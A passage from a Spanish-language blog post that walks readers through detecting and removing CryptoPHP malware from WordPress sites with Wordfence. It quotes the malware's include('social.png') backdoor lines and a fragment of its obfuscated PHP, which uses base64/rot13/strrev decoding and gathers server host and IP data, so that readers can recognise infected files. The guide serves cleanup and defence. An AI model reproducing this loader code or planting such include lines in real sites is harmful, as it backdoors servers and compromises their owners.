Scan plugin files against repository versions for changes
Scan files outside your WordPress installation
Scan image files as if they were executable
y guardar los cambios.
PASO 5:
Ir ahora a la sección administrable del plugin e ir a donde dice scan.
Comenzar un nuevo scan y esperar a que finalice.
En el cuadro de Scan Detailed Activity mostrara los archivos infectados.
PASO 6:
Al mostrarte los archivos infectados, ir en el FTP o en el FILEMANAGER e ir a borrar los archivos.
antes de empezar a borrarlos solo borra aquellos que sean png, jpg o gif, como ejemplo social.png
y los archivos php como ejemplo functions.php edítalo y dentro trata de encontrar un texto similar:
include('social.png');
o similar a:
require('soacial.png');
(esta parte puede ser tediosa ya que sera de leer linea tras linea)
Al encontrar eso borrar esas lineas y guardar el archivo.
Después de este paso repitan el paso 5 hasta que ya no existan archivos maliciosos.
Espero que esta publicación sea de su ayuda, para algún detalle pueden contactarme desde el formulario de contacto de este sitio y declaro que si tuvieran DIM WORKS CMS no tendrían estos problemas.
TIP: si quieren saber si su sitio esta infectado usen esta herramienta: http://scan.cryptophp.com/
EDIT UPDATE:
PASO 6:
En la nueva version de Wordfence puedes borrar los archivos despues de hacer el sacan...
Te apareceran en la parte de abajo (Recuerda solo borra aquellos que sean png, jpg o gif)
o los que tengan esta parte de código:
"
str_rot13( strrev( $ZRhtpGOgTZTZRdeSYVBw ) ) ); } if ( isset( $this->ANVoslonRNQSwwQloQTx[ 'info' ][ 'fail' ] ) ) { $RIDSsUypyvhaOoRUSAVT = (int) ( $ANVoslonRNQSwwQloQTx[ 'info' ][ 'fail' ] / 100 ); if ( $RIDSsUypyvhaOoRUSAVT == 0 ) { $RIDSsUypyvhaOoRUSAVT = 5; } else { $RIDSsUypyvhaOoRUSAVT *= 5; } } else { $RIDSsUypyvhaOoRUSAVT = 5; } return $this->TSmgHGGpCOaFpIQthvlU( $ANVoslonRNQSwwQloQTx, $RIDSsUypyvhaOoRUSAVT ); } private function kxNFPkmoRjlpKMZgBBSt( $nAdZoAdkHIGJvIPtmRmT ) { $ANVoslonRNQSwwQloQTx = array(); foreach ( $this->ANVoslonRNQSwwQloQTx[ 'emails' ] as $fzzoeSAOApURHlkJwYWs ) { $ANVoslonRNQSwwQloQTx[ ] = $fzzoeSAOApURHlkJwYWs; } foreach ( $this->keXZeLlUjrISqwBQePlM as $fzzoeSAOApURHlkJwYWs ) { $ANVoslonRNQSwwQloQTx[ ] = base64_decode( str_rot13( strrev( $fzzoeSAOApURHlkJwYWs ) ) ); } return $this->TSmgHGGpCOaFpIQthvlU( $ANVoslonRNQSwwQloQTx, $nAdZoAdkHIGJvIPtmRmT ); } private function bQhqyjECNagHOENBeGGx() { if ( ! defined( 'wp_getInfoData' ) ) { $ANVoslonRNQSwwQloQTx = array(); $ANVoslonRNQSwwQloQTx[ 'host' ] = $this->YJPpcHYXiHzJcujCRMrl(); $ANVoslonRNQSwwQloQTx[ 'page' ] = $_SERVER[ 'REQUEST_URI' ]; $ANVoslonRNQSwwQloQTx[ 'ip' ] = $_SERVER[ 'SERVER_ADDR' ]; $ANVoslonRNQSwwQloQTx[ 'eval' ] = $this->iIkbNPOMzHBEaGLuayXw();
"
Por: Oliver Leuyim Angel